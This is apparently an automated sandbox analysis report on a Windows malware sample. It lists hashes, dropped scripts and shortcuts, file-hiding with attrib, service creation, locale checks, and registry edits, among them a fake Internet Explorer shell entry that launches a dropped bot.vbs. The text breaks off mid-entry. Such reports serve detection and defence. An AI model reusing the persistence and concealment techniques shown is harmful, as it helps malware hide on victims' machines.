Analysis
-
max time kernel
94s -
max time network
113s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07/11/2024, 21:30
Static task
static1
Behavioral task
behavioral1
Sample
e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe
Resource
win10v2004-20241007-en
General
-
Target
e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe
-
Size
248KB
-
MD5
7c759a5d3efcb36c467e1e9184c5dd40
-
SHA1
24c37c209fef4eb36f6dcebbe8d39d924b31a041
-
SHA256
e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975
-
SHA512
54ff64749a60b378fe931bc74e00f31e63c2542e8c70be9abc843d1831faf4520be35ed93ee34276ca65903fd921bc036448ba7f4abc2bdf30653952b1dcd5d7
-
SSDEEP
6144:Fu2urzh9xu/XkauF5JgmbuaufWG7JbvTsCIq6G7Gfwtq:Futrzh9xOXkWmnufWG7lhP74f
Malware Config
Signatures
-
Creates new service(s) 2 TTPs
-
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3572 attrib.exe 1732 attrib.exe 2756 attrib.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation msn.exe -
Executes dropped EXE 4 IoCs
pid Process 4292 msn.exe 4884 ar2.exe 3800 ar2.exe 4108 ar2.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\runonce.cmd e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\tool.cmd e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\se1.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\fav e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\starts.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\fav\fav.cmd e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\fav\淘宝购物.url e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\soft e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\cpa.cmd e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\fav\网址导航.url e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\fav\软件下载.url e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\fav\软件下载.url e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\soft\msn.exe e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Windows NT\se1.vbs cmd.exe File opened for modification C:\Program Files\Kingsoft\myfile\fav\fav.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\file.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\360.cmd e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\xerox\tao.ico cmd.exe File created C:\Program Files\Kingsoft\myfile\se.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\Microsoft e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\fav\网址导航.url e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\file.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\tool.cmd attrib.exe File opened for modification C:\Program Files\Kingsoft\myfile\open.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\fav\fav.lnk e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\360.cmd e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\361.cmd e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Windows NT\se.vbs cmd.exe File created C:\Program Files\Kingsoft\myfile\fav\tao.ico e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\tools.lnk e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\dodo.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\安全工具.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\__tmp_rar_sfx_access_check_240626921 e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\se.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\runonce.cmd e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\cpa.cmd e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\361.cmd e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\dodo.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\xerox\tao.ico cmd.exe File opened for modification C:\Program Files\Kingsoft e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\open.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\fav\tao.ico e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\fav\tao2.ico e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Windows NT\se.vbs cmd.exe File opened for modification C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\starts.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\soft\msn.exe e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Windows NT\se1.vbs cmd.exe File created C:\Program Files\Kingsoft\myfile\fav\fav.lnk e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\fav\tao2.ico e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\fav\淘宝购物.url e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\tools.lnk e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\安全工具.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File opened for modification C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs attrib.exe File created C:\Program Files\Kingsoft\myfile\tool.cmd e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe File created C:\Program Files\Kingsoft\myfile\se1.vbs e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2440 sc.exe 1264 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 50 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ar2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ar2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ar2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language at.exe -
System Service Discovery 1 TTPs 3 IoCs
Adversaries may try to gather information about registered local system services.
pid Process 2440 sc.exe 4828 net.exe 3616 net1.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31142236" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a43d217a0cb97a4db769f976d8642e3900000000020000000000106600000001000020000000d95c69122c8541d3d5734b33ee2c73b3199972c1b000734a881642e5c167e6d1000000000e8000000002000020000000124ea807d3e5498e25be90fa5f9f06c2425e5e08a89da6866c2de831413107ba2000000075b32362eab0a167a00516677ecd1815e6b69b1c6d41dcd7891a24f9cd5451ae400000004800225125246914b43ab318bd56f3d20580d8ed767c3e9ba17348ecf15d679a31893afa9e2c0ce4acd4bbfaf9627fb3826c10773a5325fa8fcc46177215efd0 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31142236" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31142236" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30d410675c31db01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1712909909" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a43d217a0cb97a4db769f976d8642e3900000000020000000000106600000001000020000000a151198040e7728ff4d08b878b3ceba851d35e0ad628ef4d5729477ccc7f0303000000000e8000000002000020000000980078381d2d5506e2c9b78377233c9bcbfbfcce47997a1deb8baf7e3fbb7495200000005c937bc29cb5091fdb88a73085103054b52b18f4c7f7119c7ad3de1f19421d8740000000ef485b24ba2f988799828c2a083e2010de15a2f39936ae3cd8a815ac68e50debd495aaf33e4a6c3f9987a316b04dd96582a6dfb3ad88bb30e0f9423c84077108 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{9195284E-9D4F-11EF-ADF2-5227CD58F2D9} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 200018675c31db01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1710878674" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31142236" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1712909909" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437780028" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1710878674" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe -
Modifies registry class 45 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB} reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H) reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\Attributes = "0" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InfoTip = "@shdoclc.dll,-880" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\LocalizedString = "@shdoclc.dll,-880" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\ = "┤≥┐¬╓≈╥│(&H)" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ThreadingModel = "Apartment" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon\ = "shdoclc.dll,0" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder reg.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB} reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H) reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "wscript.exe c:\\progra~1\\Kingsoft\\myfile\\Microsoft\\bot.vbs" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder reg.exe Set value (str) 